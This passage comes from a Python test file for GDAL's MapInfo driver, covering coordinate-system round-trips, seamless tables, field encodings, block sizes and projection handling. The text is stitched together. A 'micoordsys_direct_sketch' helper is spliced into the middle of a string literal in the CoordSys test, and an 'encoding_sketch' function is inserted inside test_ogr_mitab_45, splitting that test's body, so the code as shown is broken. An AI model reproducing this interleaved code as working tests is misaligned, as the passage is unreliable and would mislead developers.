get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert (\n wkt\n == 'GEOGCS[\"unnamed\",DATUM[\"WGS_1984\",SPHEROID[\"WGS 84\",6378137,298.257223563]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AXIS[\"Latitude\",NORTH],AXIS[\"Longitude\",EAST]]'\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == \"CoordSys Earth Projection 1, 104\"\n\n # Projected\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(32631)\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == 'CoordSys Earth Projection 8, 104, \"m\", 3, 0, 0.9996, 500000, 
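\n\n###############################################################################\n# The two helpers above round-trip CoordSys strings through a temporary .mif\n# on purpose, to exercise the driver. OSR also exposes a direct conversion\n# (used by test_ogr_mitab_custom_datum_export near the end of this file);\n# note that only the driver appends the optional Bounds clause. Sketch:\n\n\ndef micoordsys_direct_sketch():\n    from osgeo import osr\n\n    srs = osr.SpatialReference()\n    srs.ImportFromEPSG(4326)\n    print(srs.ExportToMICoordSys())  # 'Earth Projection 1, 104'\n    srs2 = osr.SpatialReference()\n    srs2.ImportFromMICoordSys("Earth Projection 1, 104")\n    return srs2\n\n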
0'\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert (\n wkt\n == 'PROJCS[\"unnamed\",GEOGCS[\"unnamed\",DATUM[\"WGS_1984\",SPHEROID[\"WGS 84\",6378137,298.257223563]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]]],PROJECTION[\"Transverse_Mercator\"],PARAMETER[\"latitude_of_origin\",0],PARAMETER[\"central_meridian\",3],PARAMETER[\"scale_factor\",0.9996],PARAMETER[\"false_easting\",500000],PARAMETER[\"false_northing\",0],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]],AXIS[\"Easting\",EAST],AXIS[\"Northing\",NORTH]]'\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == 'CoordSys Earth Projection 8, 104, \"m\", 3, 0, 0.9996, 500000, 0'\n\n # Test round-tripping of projection methods and a few units\n for coordsys in [\n \"CoordSys Earth Projection 1, 104\",\n 'CoordSys Earth Projection 2, 104, \"survey ft\", 1, 2',\n 'CoordSys Earth Projection 3, 104, \"ft\", 1, 2, 3, 4, 5, 6',\n 'CoordSys Earth Projection 4, 104, \"m\", 1, 90, 90',\n 'CoordSys Earth Projection 5, 104, \"m\", 1, 90, 90',\n 'CoordSys Earth Projection 6, 104, \"m\", 1, 2, 3, 4, 5, 6',\n 'CoordSys Earth Projection 7, 104, \"m\", 1, 2, 3, 4, 5, 6',\n 'CoordSys Earth Projection 8, 104, \"m\", 1, 2, 3, 4, 5',\n 'CoordSys Earth Projection 9, 104, \"m\", 1, 2, 3, 4, 5, 6',\n 'CoordSys Earth Projection 10, 104, \"m\", 1',\n 'CoordSys Earth Projection 11, 104, \"m\", 1',\n 'CoordSys Earth Projection 12, 104, \"m\", 1',\n 'CoordSys Earth Projection 13, 104, \"m\", 1',\n 'CoordSys Earth Projection 14, 104, \"m\", 1',\n 'CoordSys Earth Projection 15, 104, \"m\", 1',\n 'CoordSys Earth Projection 16, 104, \"m\", 1',\n 'CoordSys Earth Projection 17, 104, \"m\", 1',\n 'CoordSys Earth Projection 18, 104, \"m\", 1, 2, 3, 4',\n 'CoordSys Earth Projection 19, 104, \"m\", 1, 2, 3, 4, 5, 6',\n 'CoordSys Earth Projection 20, 104, \"m\", 1, 2, 3, 4, 5',\n #'CoordSys Earth Projection 21, 104, \"m\", 1, 2, 3, 4, 5',\n #'CoordSys Earth Projection 22, 104, \"m\", 1, 2, 3, 4, 5',\n #'CoordSys Earth Projection 23, 104, \"m\", 1, 2, 3, 4, 5',\n #'CoordSys Earth Projection 24, 104, \"m\", 1, 2, 3, 4, 5',\n 'CoordSys Earth Projection 25, 104, \"m\", 1, 2, 3, 4',\n 'CoordSys Earth Projection 26, 104, \"m\", 1, 2',\n 'CoordSys Earth Projection 27, 104, \"m\", 1, 2, 3, 4',\n 'CoordSys Earth Projection 28, 104, \"m\", 1, 2, 90',\n # 'CoordSys Earth Projection 29, 104, \"m\", 1, 90, 90', # alias of 4\n 'CoordSys Earth Projection 30, 104, \"m\", 1, 2, 3, 4',\n 'CoordSys Earth Projection 31, 104, \"m\", 1, 2, 3, 4, 5',\n 'CoordSys Earth Projection 32, 104, \"m\", 1, 2, 3, 4, 5, 6',\n 'CoordSys Earth Projection 33, 104, \"m\", 1, 2, 3, 4',\n ]:\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n # print(srs)\n got_coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n # if got_coordsys.find(' Bounds') >= 0:\n # got_coordsys = got_coordsys[0:got_coordsys.find(' Bounds')]\n assert coordsys == got_coordsys, srs\n\n # Test TOWGS84\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4322)\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == \"CoordSys Earth Projection 1, 103\"\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert wkt in (\n 'GEOGCS[\"unnamed\",DATUM[\"WGS_1972\",SPHEROID[\"WGS 72\",6378135,298.26]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AXIS[\"Latitude\",NORTH],AXIS[\"Longitude\",EAST]]',\n 
'GEOGCS[\"unnamed\",DATUM[\"World_Geodetic_System_1972\",SPHEROID[\"WGS 72\",6378135,298.26]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AXIS[\"Latitude\",NORTH],AXIS[\"Longitude\",EAST]]',\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == \"CoordSys Earth Projection 1, 103\"\n\n # Test Lambert 93\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(2154)\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert (\n coordsys\n == 'CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49, 700000, 6600000'\n )\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n assert srs.GetAuthorityCode(None) == \"2154\"\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert (\n coordsys\n == 'CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49, 700000, 6600000'\n )\n\n srs = osr.SpatialReference(\n 'PROJCS[\"RGF93 / Lambert-93\",GEOGCS[\"RGF93\",DATUM[\"Reseau_Geodesique_Francais_1993\",SPHEROID[\"GRS 80\",6378137,298.257222101]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433]],PROJECTION[\"Lambert_Conformal_Conic_2SP\"],PARAMETER[\"standard_parallel_1\",49.00000000002],PARAMETER[\"standard_parallel_2\",44],PARAMETER[\"latitude_of_origin\",46.5],PARAMETER[\"central_meridian\",3],PARAMETER[\"false_easting\",700000],PARAMETER[\"false_northing\",6600000],UNIT[\"Meter\",1.0],AUTHORITY[\"EPSG\",\"2154\"]]'\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert (\n coordsys\n == 'CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49.00000000002, 700000, 6600000'\n )\n with gdal.config_option(\"MITAB_BOUNDS_FILE\", \"data/mitab/mitab_bounds.txt\"):\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert (\n coordsys\n == 'CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49.00000000002, 700000, 6600000 Bounds (75000, 6000000) (1275000, 7200000)'\n )\n\n # http://trac.osgeo.org/gdal/ticket/4115\n srs = get_srs_from_coordsys(tmp_vsimem, 'CoordSys Earth Projection 10, 157, \"m\", 0')\n wkt = srs.ExportToWkt()\n assert (\n wkt\n == 'PROJCS[\"WGS 84 / Pseudo-Mercator\",GEOGCS[\"WGS 84\",DATUM[\"WGS_1984\",SPHEROID[\"WGS 84\",6378137,298.257223563,AUTHORITY[\"EPSG\",\"7030\"]],AUTHORITY[\"EPSG\",\"6326\"]],PRIMEM[\"Greenwich\",0,AUTHORITY[\"EPSG\",\"8901\"]],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AUTHORITY[\"EPSG\",\"4326\"]],PROJECTION[\"Mercator_1SP\"],PARAMETER[\"central_meridian\",0],PARAMETER[\"scale_factor\",1],PARAMETER[\"false_easting\",0],PARAMETER[\"false_northing\",0],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]],AXIS[\"Easting\",EAST],AXIS[\"Northing\",NORTH],EXTENSION[\"PROJ4\",\"+proj=merc +a=6378137 +b=6378137 +lat_ts=0 +lon_0=0 +x_0=0 +y_0=0 +k=1 +units=m +nadgrids=@null +wktext +no_defs\"]]'\n )\n # We don't round-trip currently\n\n # MIF 999\n srs = osr.SpatialReference(\n \"\"\"GEOGCS[\"unnamed\",\n DATUM[\"MIF 999,1,1,2,3\",\n SPHEROID[\"WGS 72\",6378135,298.26]],\n PRIMEM[\"Greenwich\",0],\n UNIT[\"degree\",0.0174532925199433]]\"\"\"\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == \"CoordSys Earth Projection 1, 999, 1, 1, 2, 3\"\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert (\n wkt\n == 'GEOGCS[\"unnamed\",DATUM[\"MIF 999,1,1,2,3\",SPHEROID[\"WGS 72\",6378135,298.26],TOWGS84[1,2,3,0,0,0,0]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AXIS[\"Latitude\",NORTH],AXIS[\"Longitude\",EAST]]'\n )\n\n # MIF 9999\n srs = osr.SpatialReference(\n 
\"\"\"GEOGCS[\"unnamed\",\n DATUM[\"MIF 9999,1,1,2,3,4,5,6,7,3\",\n SPHEROID[\"WGS 72\",6378135,298.26]],\n PRIMEM[\"Greenwich\",0],\n UNIT[\"degree\",0.0174532925199433]]\"\"\"\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == \"CoordSys Earth Projection 1, 9999, 1, 1, 2, 3, 4, 5, 6, 7, 3\"\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert (\n wkt\n == 'GEOGCS[\"unnamed\",DATUM[\"MIF 9999,1,1,2,3,4,5,6,7,3\",SPHEROID[\"WGS 72\",6378135,298.26],TOWGS84[1,2,3,-4,-5,-6,7]],PRIMEM[\"non-Greenwich\",3],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AXIS[\"Latitude\",NORTH],AXIS[\"Longitude\",EAST]]'\n )\n\n # Test EPSG:2393 / KKJ\n srs = osr.SpatialReference(\n \"\"\"PROJCS[\"KKJ / Finland Uniform Coordinate System\",GEOGCS[\"KKJ\",DATUM[\"Kartastokoordinaattijarjestelma_1966\",SPHEROID[\"International 1924\",6378388,297,AUTHORITY[\"EPSG\",\"7022\"]],AUTHORITY[\"EPSG\",\"6123\"]],PRIMEM[\"Greenwich\",0,AUTHORITY[\"EPSG\",\"8901\"]],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AUTHORITY[\"EPSG\",\"4123\"]],PROJECTION[\"Transverse_Mercator\"],PARAMETER[\"latitude_of_origin\",0],PARAMETER[\"central_meridian\",27],PARAMETER[\"scale_factor\",1],PARAMETER[\"false_easting\",3500000],PARAMETER[\"false_northing\",0],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]],AXIS[\"Northing\",NORTH],AXIS[\"Easting\",EAST],AUTHORITY[\"EPSG\",\"2393\"]]\"\"\"\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == 'CoordSys Earth Projection 24, 1016, \"m\", 27, 0, 1, 3500000, 0'\n srs = get_srs_from_coordsys(tmp_vsimem, coordsys)\n wkt = srs.ExportToWkt()\n assert (\n wkt\n == 'PROJCS[\"unnamed\",GEOGCS[\"unnamed\",DATUM[\"Kartastokoordinaattijarjestelma_1966\",SPHEROID[\"International 1924\",6378388,297]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]]],PROJECTION[\"Transverse_Mercator\"],PARAMETER[\"latitude_of_origin\",0],PARAMETER[\"central_meridian\",27],PARAMETER[\"scale_factor\",1],PARAMETER[\"false_easting\",3500000],PARAMETER[\"false_northing\",0],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]],AXIS[\"Easting\",EAST],AXIS[\"Northing\",NORTH]]'\n )\n coordsys = get_coordsys_from_srs(tmp_vsimem, srs)\n assert coordsys == 'CoordSys Earth Projection 24, 1016, \"m\", 27, 0, 1, 3500000, 0'\n\n\n###############################################################################\n# Test opening and modifying a file with polygons created with MapInfo that consists of\n# a single object block, without index block\n\n\ndef test_ogr_mitab_36(tmp_path):\n\n # Test modifying a new object\n for ext in (\"tab\", \"dat\", \"id\", \"map\"):\n shutil.copy(f\"data/mitab/polygon_without_index.{ext}\", tmp_path)\n\n ds = ogr.Open(tmp_path / \"polygon_without_index.tab\", update=1)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n g = f.GetGeometryRef()\n ring = g.GetGeometryRef(0)\n ring.SetPoint_2D(1, ring.GetX(1) + 100, ring.GetY())\n g = g.Clone()\n f.SetGeometry(g)\n lyr.SetFeature(f)\n f = None\n ds = None\n\n ds = ogr.Open(tmp_path / \"polygon_without_index.tab\")\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n got_g = f.GetGeometryRef()\n ogrtest.check_feature_geometry(f, got_g, max_error=0.1)\n while True:\n f = lyr.GetNextFeature()\n if f is None:\n break\n ds = None\n\n\n###############################################################################\n# Simple testing of Seamless tables\n\n\ndef test_ogr_mitab_37():\n\n ds = 
ogr.Open(\"data/mitab/seamless.tab\")\n lyr = ds.GetLayer(0)\n assert lyr.GetFeatureCount() == 4\n\n f = lyr.GetNextFeature()\n assert f.GetFID() == 4294967297 and f.id == \"1\"\n\n f = lyr.GetNextFeature()\n assert f.GetFID() == 4294967298 and f.id == \"2\"\n\n f = lyr.GetNextFeature()\n assert f.GetFID() == 8589934593 and f.id == \"3\"\n\n f = lyr.GetNextFeature()\n assert f.GetFID() == 8589934594 and f.id == \"4\"\n\n f = lyr.GetFeature(4294967297)\n assert f.GetFID() == 4294967297 and f.id == \"1\"\n\n f = lyr.GetFeature(8589934594)\n assert f.GetFID() == 8589934594 and f.id == \"4\"\n\n f = lyr.GetFeature(8589934594 + 1)\n assert f is None\n\n f = lyr.GetFeature(4294967297 * 2 + 1)\n assert f is None\n\n\n###############################################################################\n# Open MIF with MID with TAB delimiter and empty first field (#5405)\n\n\ndef test_ogr_mitab_38():\n\n ds = ogr.Open(\"data/mitab/empty_first_field_with_tab_delimiter.mif\")\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n if f[\"field1\"] != \"\" or f[\"field2\"] != \"foo\":\n f.DumpReadable()\n pytest.fail()\n\n\n###############################################################################\n# Read various geometry types from .mif\n\n\n@pytest.mark.require_driver(\"CSV\")\ndef test_ogr_mitab_39():\n\n ds = ogr.Open(\"data/mitab/all_geoms.mif\")\n lyr = ds.GetLayer(0)\n ds_ref = ogr.Open(\"data/mitab/all_geoms.mif.golden.csv\")\n lyr_ref = ds_ref.GetLayer(0)\n\n while True:\n f = lyr.GetNextFeature()\n f_ref = lyr_ref.GetNextFeature()\n if f is None:\n assert f_ref is None\n break\n\n ogrtest.check_feature_geometry(f, f_ref.GetGeometryRef())\n assert f.GetStyleString() == f_ref.GetStyleString()\n\n\n###############################################################################\n# Read various geometry types from .mif but potentially truncated\n\n\ndef test_ogr_mitab_40(tmp_vsimem):\n\n content = open(\"data/mitab/all_geoms.mif\", \"rt\").read()\n\n for i in range(len(content)):\n gdal.FileFromMemBuffer(tmp_vsimem / \"ogr_mitab_40.mif\", content[0:i])\n with gdal.quiet_errors():\n ds = ogr.Open(tmp_vsimem / \"ogr_mitab_40.mif\")\n if ds is not None:\n lyr = ds.GetLayer(0)\n for _ in lyr:\n pass\n\n\n###############################################################################\n# Read various geometry types from .tab\n\n\n@pytest.mark.require_driver(\"CSV\")\ndef test_ogr_mitab_41():\n\n ds = ogr.Open(\"data/mitab/all_geoms.tab\")\n lyr = ds.GetLayer(0)\n ds_ref = ogr.Open(\"data/mitab/all_geoms.mif.golden.csv\")\n lyr_ref = ds_ref.GetLayer(0)\n\n while True:\n f = lyr.GetNextFeature()\n f_ref = lyr_ref.GetNextFeature()\n if f is None:\n assert f_ref is None\n break\n\n ogrtest.check_feature_geometry(f, f_ref.GetGeometryRef())\n assert f.GetStyleString() == f_ref.GetStyleString()\n\n\n###############################################################################\n# Read various geometry types from .tab with block size = 32256\n\n\n@pytest.mark.require_driver(\"CSV\")\ndef test_ogr_mitab_42():\n\n ds = ogr.Open(\"/vsizip/data/mitab/all_geoms_block_32256.zip\")\n lyr = ds.GetLayer(0)\n ds_ref = ogr.Open(\"data/mitab/all_geoms.mif.golden.csv\")\n lyr_ref = ds_ref.GetLayer(0)\n\n while True:\n f = lyr.GetNextFeature()\n f_ref = lyr_ref.GetNextFeature()\n if f is None:\n assert f_ref is None\n break\n\n ogrtest.check_feature_geometry(f, f_ref.GetGeometryRef())\n assert f.GetStyleString() == f_ref.GetStyleString()\n\n\n###############################################################################\n# 
Test creating tab with block size = 32256\n\n\ndef test_ogr_mitab_43(tmp_vsimem):\n\n src_ds = gdal.OpenEx(\"/vsizip/data/mitab/all_geoms_block_32256.zip\")\n gdal.VectorTranslate(\n tmp_vsimem / \"all_geoms_block_512.tab\", src_ds, format=\"MapInfo File\"\n )\n gdal.VectorTranslate(\n tmp_vsimem / \"all_geoms_block_32256.tab\",\n src_ds,\n format=\"MapInfo File\",\n datasetCreationOptions=[\"BLOCKSIZE=32256\"],\n )\n with gdal.quiet_errors():\n out_ds = gdal.VectorTranslate(\n tmp_vsimem / \"all_geoms_block_invalid.tab\",\n src_ds,\n format=\"MapInfo File\",\n datasetCreationOptions=[\"BLOCKSIZE=32768\"],\n )\n assert out_ds is None\n gdal.Unlink(tmp_vsimem / \"all_geoms_block_invalid.dat\")\n src_ds = None\n\n size = gdal.VSIStatL(tmp_vsimem / \"all_geoms_block_512.map\").size\n assert size == 7168\n\n size = gdal.VSIStatL(tmp_vsimem / \"all_geoms_block_32256.map\").size\n assert size == 161280\n\n ds = ogr.Open(tmp_vsimem / \"all_geoms_block_32256.tab\")\n lyr = ds.GetLayer(0)\n ds_ref = ogr.Open(tmp_vsimem / \"all_geoms_block_512.tab\")\n lyr_ref = ds_ref.GetLayer(0)\n\n while True:\n f = lyr.GetNextFeature()\n f_ref = lyr_ref.GetNextFeature()\n if f is None:\n assert f_ref is None\n break\n\n ogrtest.check_feature_geometry(f, f_ref.GetGeometryRef())\n assert f.GetStyleString() == f_ref.GetStyleString()\n\n\n###############################################################################\n# Test limitation on width and precision of numeric fields in creation (#6392)\n\n\ndef test_ogr_mitab_44(tmp_vsimem):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_vsimem / \"ogr_mitab_44.mif\"\n )\n lyr = ds.CreateLayer(\"test\")\n fld_defn = ogr.FieldDefn(\"test\", ogr.OFTReal)\n fld_defn.SetWidth(30)\n fld_defn.SetPrecision(29)\n lyr.CreateField(fld_defn)\n ds = None\n\n ds = ogr.Open(tmp_vsimem / \"ogr_mitab_44.mif\")\n lyr = ds.GetLayer(0)\n fld_defn = lyr.GetLayerDefn().GetFieldDefn(0)\n assert fld_defn.GetWidth() == 20 and fld_defn.GetPrecision() == 16\n ds = None\n\n\n###############################################################################\n# Test read/write MapInfo layers with encoding specified\n\n\n@pytest.mark.parametrize(\"frmt\", (\"MIF\", \"TAB\"))\n@pytest.mark.parametrize(\"lyrCount\", (1, 2))\ndef test_ogr_mitab_45(tmp_vsimem, frmt, lyrCount):\n\n lyrNames = [\"lyr1\", \"lyr2\"]\n fldNames = [\"field1\", \"абвгдежзийклмнопрстуфхцчшщьъэюя\"]\n featNames = [\"аз\", \"буки\", \"веди\"]\n\n if lyrCount == 1:\n dsName = tmp_vsimem / f\"ogr_mitab_45_{frmt}_{lyrCount}.{frmt.lower()}\"\n else:\n dsName = tmp_vsimem / f\"ogr_mitab_45_{frmt}_{lyrCount}\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n dsName, options=[\"FORMAT=\" + frmt]\n )\n\n assert ds is not None, \"Can't create dataset: \" + dsName\n\n for i in range(lyrCount):\n lyr = ds.CreateLayer(lyrNames[i], options=[\"ENCODING=CP1251\"])\n assert lyr is not None, f\"Can't create layer {lyrNames[i]} for {dsName}\"\n\n if lyr.TestCapability(ogr.OLCStringsAsUTF8) != 1:\n pytest.skip(\"skipping test: recode is not possible\")\n\n for fldName in fldNames:\n fld_defn = ogr.FieldDefn(fldName, ogr.OFTString)\n fld_defn.SetWidth(254)\n lyr.CreateField(fld_defn)\n\n for featName in featNames:\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT (25 72)\"))\n for fldName in fldNames:\n featValue = fldName + \" \" + featName\n feat.SetField(fldName, featValue)\n lyr.CreateFeature(feat)\n ds = None\n\n # reopen and check\n ds = ogr.Open(dsName)\n 
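\n\n###############################################################################\n# Sketch of the ENCODING round trip that test_ogr_mitab_45 automates: strings\n# are handed to OGR as UTF-8 and recoded to the declared layer encoding on\n# disk, provided OLCStringsAsUTF8 reports that recoding is available. The\n# output name is illustrative.\n\n\ndef encoding_sketch(out_filename="/vsimem/enc_sketch.tab"):\n    from osgeo import ogr\n\n    ds = ogr.GetDriverByName("MapInfo File").CreateDataSource(out_filename)\n    lyr = ds.CreateLayer("test", options=["ENCODING=CP1251"])\n    if lyr.TestCapability(ogr.OLCStringsAsUTF8) != 1:\n        return  # recoding not available in this build\n    lyr.CreateField(ogr.FieldDefn("name", ogr.OFTString))\n    f = ogr.Feature(lyr.GetLayerDefn())\n    f.SetField("name", "буки")  # stored as CP1251, read back as UTF-8\n    f.SetGeometryDirectly(ogr.CreateGeometryFromWkt("POINT (25 72)"))\n    lyr.CreateFeature(f)\n    ds = None\n\n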
assert ds is not None, \"Can't reopen dataset: \" + dsName\n\n for i in range(lyrCount):\n lyr = ds.GetLayer(i)\n assert lyr is not None, \"Can't get layer \" + lyrNames[i] + \" from \" + dsName\n\n for fldN, expectedName in enumerate(fldNames):\n fldName = lyr.GetLayerDefn().GetFieldDefn(fldN).GetName()\n assert fldName == expectedName, (\n \"Can't get field name\\n\" + ' result name: \"' + fldName + '\"\\n'\n ' expected name: \"' + expectedName + '\"\\n'\n \" from layer : \" + lyrNames[i] + \" from dataset :\" + dsName\n )\n\n for featName in featNames:\n feat = lyr.GetNextFeature()\n for fldN, fldName in enumerate(fldNames):\n expectedValue = fldName + \" \" + featName\n # column value by number\n value = feat.GetField(fldN)\n assert value == expectedValue, (\n \"Can't get field value by number\\n\"\n + ' result value: \"'\n + value\n + '\"\\n'\n ' expected value: \"' + expectedValue + '\"\\n'\n \" from layer : \" + lyrNames[i] + \" from dataset :\" + dsName\n )\n # column value by name\n value = feat.GetField(fldNames[fldN])\n assert value == expectedValue, (\n \"Can't get field value by name\\n\"\n + ' result value: \"'\n + value\n + '\"\\n'\n ' expected value: \"' + expectedValue + '\"\\n'\n \" from layer : \" + lyrNames[i] + \" from dataset :\" + dsName\n )\n\n\n###############################################################################\n# Test read MapInfo layers with encoding specified\n\n\n@pytest.mark.parametrize(\"fname\", (\"tab-win1251.TAB\", \"win1251.mif\"))\ndef test_ogr_mitab_46(fname):\n\n fldNames = [\"Поле_А\", \"Поле_Б\", \"Поле_В\", \"Поле_Г\", \"Поле_Д\"]\n fldVal = [\n [\"Значение А\", \"Значение Б\", \"Значение В\", \"Значение Г\", \"Значение Д\"],\n [\"Значение 1\", \"Значение 2\", \"Значение 3\", \"Значение 4\", \"Значение 5\"],\n [\"Полигон\", \"Синий\", \"Заливка\", \"А а Б б\", \"ЪЫЁЩ\"],\n ]\n\n dsName = os.path.join(\"data/mitab\", fname)\n\n ds = ogr.Open(dsName)\n assert ds is not None, \"Can't open dataset: \" + dsName\n\n lyr = ds.GetLayer(0)\n assert lyr is not None, \"Can't get layer 0 from \" + dsName\n\n if lyr.TestCapability(ogr.OLCStringsAsUTF8) != 1:\n pytest.skip(\"skipping test: recode is not possible\")\n\n for fldN, expectedName in enumerate(fldNames):\n fldName = lyr.GetLayerDefn().GetFieldDefn(fldN).GetName()\n assert fldName == expectedName, (\n \"Can't get field\\n\" + ' result name: \"' + fldName + '\"\\n'\n ' expected name: \"' + expectedName + '\"\\n'\n \" from dataset :\" + dsName\n )\n\n for featFldVal in fldVal:\n feat = lyr.GetNextFeature()\n for fldN, fldName in enumerate(fldNames):\n expectedValue = featFldVal[fldN]\n # column value by number\n value = feat.GetField(fldN)\n assert value == expectedValue, (\n \"Can't get field value by number\\n\"\n + ' result value: \"'\n + value\n + '\"\\n'\n ' expected value: \"' + expectedValue + '\"\\n'\n \" from dataset :\" + dsName\n )\n # column value by name\n value = feat.GetField(fldName)\n assert value == expectedValue, (\n \"Can't get field value by name\\n\" + ' result value: \"' + value + '\"\\n'\n ' expected value: \"' + expectedValue + '\"\\n'\n \" from dataset :\" + dsName\n )\n\n\n###############################################################################\n# Test opening a dataset with a .ind file\n\n\ndef test_ogr_mitab_47(tmp_vsimem):\n\n ds = ogr.Open(\"data/mitab/poly_indexed.tab\")\n lyr = ds.GetLayer(0)\n lyr.SetAttributeFilter(\"PRFEDEA = '35043413'\")\n assert lyr.GetFeatureCount() == 1\n\n for ext in (\"tab\", \"dat\", \"map\", \"id\"):\n 
gdal.FileFromMemBuffer(\n tmp_vsimem / f\"poly_indexed.{ext}\",\n open(\"data/mitab/poly_indexed.\" + ext, \"rb\").read(),\n )\n ds = ogr.Open(tmp_vsimem / \"poly_indexed.tab\")\n lyr = ds.GetLayer(0)\n lyr.SetAttributeFilter(\"PRFEDEA = '35043413'\")\n assert lyr.GetFeatureCount() == 1\n ds = None\n\n\n###############################################################################\n# Test writing and reading LCC_1SP\n\n\ndef test_ogr_mitab_48(tmp_vsimem):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(tmp_vsimem / \"test.mif\")\n sr = osr.SpatialReference()\n sr.SetFromUserInput(\n \"\"\"PROJCS[\"NTF (Paris) / France IV (deprecated)\",\n GEOGCS[\"NTF (Paris)\",\n DATUM[\"Nouvelle_Triangulation_Francaise_Paris\",\n SPHEROID[\"Clarke 1880 (IGN)\",6378249.2,293.4660212936269,\n AUTHORITY[\"EPSG\",\"7011\"]],\n TOWGS84[-168,-60,320,0,0,0,0],\n AUTHORITY[\"EPSG\",\"6807\"]],\n PRIMEM[\"Paris\",2.33722917,\n AUTHORITY[\"EPSG\",\"8903\"]],\n UNIT[\"grad\",0.01570796326794897,\n AUTHORITY[\"EPSG\",\"9105\"]],\n AUTHORITY[\"EPSG\",\"4807\"]],\n PROJECTION[\"Lambert_Conformal_Conic_1SP\"],\n PARAMETER[\"latitude_of_origin\",46.85],\n PARAMETER[\"central_meridian\",0],\n PARAMETER[\"scale_factor\",0.99994471],\n PARAMETER[\"false_easting\",234.358],\n PARAMETER[\"false_northing\",4185861.369],\n UNIT[\"metre\",1,\n AUTHORITY[\"EPSG\",\"9001\"]],\n AXIS[\"X\",EAST],\n AXIS[\"Y\",NORTH],\n AUTHORITY[\"EPSG\",\"27584\"]]\"\"\"\n )\n lyr = ds.CreateLayer(\"foo\", srs=sr)\n lyr.CreateField(ogr.FieldDefn(\"foo\", ogr.OFTString))\n ds = None\n\n ds = ogr.Open(tmp_vsimem / \"test.mif\")\n lyr = ds.GetLayer(0)\n sr_got = lyr.GetSpatialRef()\n ds = None\n\n sr_expected = osr.SpatialReference()\n sr_expected.SetFromUserInput(\n \"\"\"PROJCS[\"unnamed\",\n GEOGCS[\"unnamed\",\n DATUM[\"NTF_Paris_Meridian\",\n SPHEROID[\"Clarke 1880 (modified for IGN)\",6378249.2,293.4660213],\n TOWGS84[-168,-60,320,0,0,0,0]],\n PRIMEM[\"Paris\",2.33722917],\n UNIT[\"degree\",0.0174532925199433]],\n PROJECTION[\"Lambert_Conformal_Conic_1SP\"],\n PARAMETER[\"latitude_of_origin\",42.165],\n PARAMETER[\"central_meridian\",0],\n PARAMETER[\"scale_factor\",0.99994471],\n PARAMETER[\"false_easting\",234.358],\n PARAMETER[\"false_northing\",4185861.369],\n UNIT[\"metre\",1]]\"\"\"\n )\n\n assert sr_got.IsSame(sr_expected) != 0, sr_got.ExportToPrettyWkt()\n\n\n###############################################################################\n# Test reading an aspatial TAB file.\n\n\ndef test_ogr_mitab_49_aspatial():\n\n ds = ogr.GetDriverByName(\"MapInfo File\").Open(\"data/mitab/aspatial.tab\")\n lyr = ds.GetLayer(0)\n\n geom_type = lyr.GetLayerDefn().GetGeomType()\n assert geom_type == ogr.wkbNone\n\n assert lyr.GetSpatialRef() is None\n\n assert lyr.GetExtent(can_return_null=True) is None\n\n\n###############################################################################\n# Test 